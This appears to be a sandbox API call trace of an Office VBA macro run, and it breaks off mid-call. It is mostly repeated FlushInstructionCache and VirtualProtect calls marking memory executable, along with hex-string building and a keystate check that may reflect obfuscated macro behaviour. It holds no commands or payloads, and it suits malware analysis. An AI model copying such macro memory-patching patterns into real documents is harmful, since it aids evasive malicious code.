[0114.685] GetCurrentProcess () returned 0xffffffff [0114.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.685] GetCurrentProcess () returned 0xffffffff [0114.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.685] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.686] GetCurrentProcess () returned 0xffffffff [0114.686] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.686] GetCurrentProcess () returned 0xffffffff [0114.686] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.686] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.687] GetCurrentProcess () returned 0xffffffff [0114.687] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.687] GetCurrentProcess () returned 0xffffffff [0114.687] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.687] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.688] GetCurrentProcess () returned 0xffffffff [0114.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.688] GetCurrentProcess () returned 0xffffffff [0114.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.688] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.688] GetCurrentProcess () returned 0xffffffff [0114.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.688] GetCurrentProcess () returned 0xffffffff [0114.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.688] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.689] GetCurrentProcess () returned 0xffffffff [0114.689] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.689] GetCurrentProcess () returned 0xffffffff [0114.689] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.689] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.690] GetCurrentProcess () returned 0xffffffff [0114.690] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.690] GetCurrentProcess () returned 0xffffffff [0114.690] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.690] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.691] GetCurrentProcess () returned 0xffffffff [0114.691] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.691] GetCurrentProcess () returned 0xffffffff [0114.691] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.691] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.692] GetCurrentProcess () returned 0xffffffff [0114.692] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.692] GetCurrentProcess () returned 0xffffffff [0114.692] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.692] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.693] GetCurrentProcess () returned 0xffffffff [0114.693] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.693] GetCurrentProcess () returned 0xffffffff [0114.693] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.693] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.695] GetCurrentProcess () returned 0xffffffff [0114.695] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.695] GetCurrentProcess () returned 0xffffffff [0114.695] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.695] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.696] GetCurrentProcess () returned 0xffffffff [0114.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.696] GetCurrentProcess () returned 0xffffffff [0114.696] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.696] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.697] GetCurrentProcess () returned 0xffffffff [0114.697] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.697] GetCurrentProcess () returned 0xffffffff [0114.697] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.697] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.698] GetCurrentProcess () returned 0xffffffff [0114.698] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.698] GetCurrentProcess () returned 0xffffffff [0114.698] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.698] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.698] GetCurrentProcess () returned 0xffffffff [0114.698] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.698] GetCurrentProcess () returned 0xffffffff [0114.699] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.699] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.699] GetCurrentProcess () returned 0xffffffff [0114.699] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.700] GetCurrentProcess () returned 0xffffffff [0114.700] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.700] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.701] GetCurrentProcess () returned 0xffffffff [0114.701] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.701] GetCurrentProcess () returned 0xffffffff [0114.701] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.701] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.701] GetCurrentProcess () returned 0xffffffff [0114.702] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.702] GetCurrentProcess () returned 0xffffffff [0114.702] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.702] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.703] GetCurrentProcess () returned 0xffffffff [0114.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.703] GetCurrentProcess () returned 0xffffffff [0114.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.703] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.703] GetCurrentProcess () returned 0xffffffff [0114.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.703] GetCurrentProcess () returned 0xffffffff [0114.703] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.703] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.704] GetCurrentProcess () returned 0xffffffff [0114.704] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.704] GetCurrentProcess () returned 0xffffffff [0114.704] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.704] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.705] GetCurrentProcess () returned 0xffffffff [0114.705] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.705] GetCurrentProcess () returned 0xffffffff [0114.705] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.705] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.706] GetCurrentProcess () returned 0xffffffff [0114.706] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.706] GetCurrentProcess () returned 0xffffffff [0114.706] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.706] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.709] GetCurrentProcess () returned 0xffffffff [0114.709] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.709] GetCurrentProcess () returned 0xffffffff [0114.709] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.709] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.710] GetCurrentProcess () returned 0xffffffff [0114.710] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.710] GetCurrentProcess () returned 0xffffffff [0114.710] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.710] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.711] GetCurrentProcess () returned 0xffffffff [0114.711] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.711] GetCurrentProcess () returned 0xffffffff [0114.711] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.711] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.712] GetCurrentProcess () returned 0xffffffff [0114.712] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.712] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.712] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0114.712] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x695d0000 [0114.712] SetErrorMode (uMode=0x8001) returned 0x8001 [0114.713] GetProcAddress (hModule=0x695d0000, lpProcName=0x278) returned 0x696563c4 [0114.714] GetAsyncKeyState (vKey=3) returned 0 [0114.715] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.715] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0114.715] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.715] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0114.715] CRetailMalloc_Alloc () returned 0xcb0b638 [0114.715] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.715] memcpy (in: _Dst=0xb755050, _Src=0x197404, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0114.715] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11300386, cbMultiByte=5, lpWideCharStr=0x197204, cchWideChar=6 | out: lpWideCharStr="CDec") returned 5 [0114.716] CRetailMalloc_Realloc () returned 0xb316e48 [0114.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e0386, cbMultiByte=5, lpWideCharStr=0x197264, cchWideChar=6 | out: lpWideCharStr="CDec") returned 5 [0114.716] CRetailMalloc_Realloc () returned 0xb3d6708 [0114.716] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.717] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97", cchCount1=-1, lpString2="\x97\x97", cchCount2=-1) returned 1 [0114.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302e96, cbMultiByte=3, lpWideCharStr=0x197204, cchWideChar=4 | out: lpWideCharStr="——") returned 3 [0114.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c09ee, cbMultiByte=3, lpWideCharStr=0x197264, cchWideChar=4 | out: lpWideCharStr="——") returned 3 [0114.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c09ee, cbMultiByte=3, lpWideCharStr=0x197264, cchWideChar=4 | out: lpWideCharStr="——") returned 3 [0114.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c09ee, cbMultiByte=3, lpWideCharStr=0x197264, cchWideChar=4 | out: lpWideCharStr="——") returned 3 [0114.717] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97", cchCount1=-1, lpString2="\x97\x97", cchCount2=-1) returned 1 [0114.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c09ee, cbMultiByte=3, lpWideCharStr=0x197264, cchWideChar=4 | out: lpWideCharStr="——") returned 3 [0114.718] CRetailMalloc_Alloc () returned 0xcac5748 [0114.718] _mbscpy_s (in: _Dst=0xcac5748, _DstSizeInBytes=0x3, _Src=0x112c09ee | out: _Dst=0xcac5748) returned 0x0 [0114.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0cbe, cbMultiByte=10, lpWideCharStr=0x197274, cchWideChar=11 | out: lpWideCharStr="_B_var_——") returned 10 [0114.718] _mbscpy_s (in: _Dst=0x1972dc, _DstSizeInBytes=0x3, _Src=0x112c09ee | out: _Dst=0x1972dc) returned 0x0 [0114.718] CRetailMalloc_Free () returned 0x1 [0114.718] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0114.718] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.719] memcpy (in: _Dst=0xb754f4c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.719] memcpy (in: _Dst=0xb754f48, _Src=0x197254, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.719] memcpy (in: _Dst=0xb754f48, _Src=0x197254, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.719] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.719] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6980ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0114.719] memcpy (in: _Dst=0xcb0b6b0, _Src=0x197484, _Size=0x18 | out: _Dst=0xcb0b6b0) returned 0xcb0b6b0 [0114.719] CRetailMalloc_Realloc () returned 0xcb0b638 [0114.719] CRetailMalloc_Free () returned 0x1 [0114.719] GetCurrentProcess () returned 0xffffffff [0114.719] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.719] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.720] GetCurrentProcess () returned 0xffffffff [0114.720] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.720] GetCurrentProcess () returned 0xffffffff [0114.720] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.720] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.721] GetCurrentProcess () returned 0xffffffff [0114.721] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.721] GetCurrentProcess () returned 0xffffffff [0114.721] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.721] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.721] GetCurrentProcess () returned 0xffffffff [0114.721] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.721] GetCurrentProcess () returned 0xffffffff [0114.721] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.721] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.722] GetCurrentProcess () returned 0xffffffff [0114.722] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.722] GetCurrentProcess () returned 0xffffffff [0114.722] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.722] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.723] GetCurrentProcess () returned 0xffffffff [0114.723] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.723] GetCurrentProcess () returned 0xffffffff [0114.723] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.723] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.724] GetCurrentProcess () returned 0xffffffff [0114.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.724] GetCurrentProcess () returned 0xffffffff [0114.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.724] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.724] GetCurrentProcess () returned 0xffffffff [0114.724] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.724] GetCurrentProcess () returned 0xffffffff [0114.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.725] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.725] GetCurrentProcess () returned 0xffffffff [0114.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.725] GetCurrentProcess () returned 0xffffffff [0114.725] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.725] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.726] GetCurrentProcess () returned 0xffffffff [0114.726] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.726] GetCurrentProcess () returned 0xffffffff [0114.726] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.726] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.726] GetCurrentProcess () returned 0xffffffff [0114.726] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.726] GetCurrentProcess () returned 0xffffffff [0114.726] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.727] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.727] GetCurrentProcess () returned 0xffffffff [0114.727] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.727] GetCurrentProcess () returned 0xffffffff [0114.727] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.727] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.728] GetCurrentProcess () returned 0xffffffff [0114.728] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.728] GetCurrentProcess () returned 0xffffffff [0114.728] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.728] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.728] GetCurrentProcess () returned 0xffffffff [0114.728] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.728] GetCurrentProcess () returned 0xffffffff [0114.728] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.728] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.729] GetCurrentProcess () returned 0xffffffff [0114.729] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.729] GetCurrentProcess () returned 0xffffffff [0114.729] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.729] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.730] GetCurrentProcess () returned 0xffffffff [0114.730] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.730] GetCurrentProcess () returned 0xffffffff [0114.730] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.730] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.730] GetCurrentProcess () returned 0xffffffff [0114.730] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.730] GetCurrentProcess () returned 0xffffffff [0114.730] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.730] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.731] GetCurrentProcess () returned 0xffffffff [0114.731] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.731] GetCurrentProcess () returned 0xffffffff [0114.731] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.731] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.732] GetCurrentProcess () returned 0xffffffff [0114.732] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.732] GetCurrentProcess () returned 0xffffffff [0114.732] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.732] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.732] GetCurrentProcess () returned 0xffffffff [0114.732] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.732] GetCurrentProcess () returned 0xffffffff [0114.732] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.732] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.733] GetCurrentProcess () returned 0xffffffff [0114.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.733] GetCurrentProcess () returned 0xffffffff [0114.733] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.733] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: 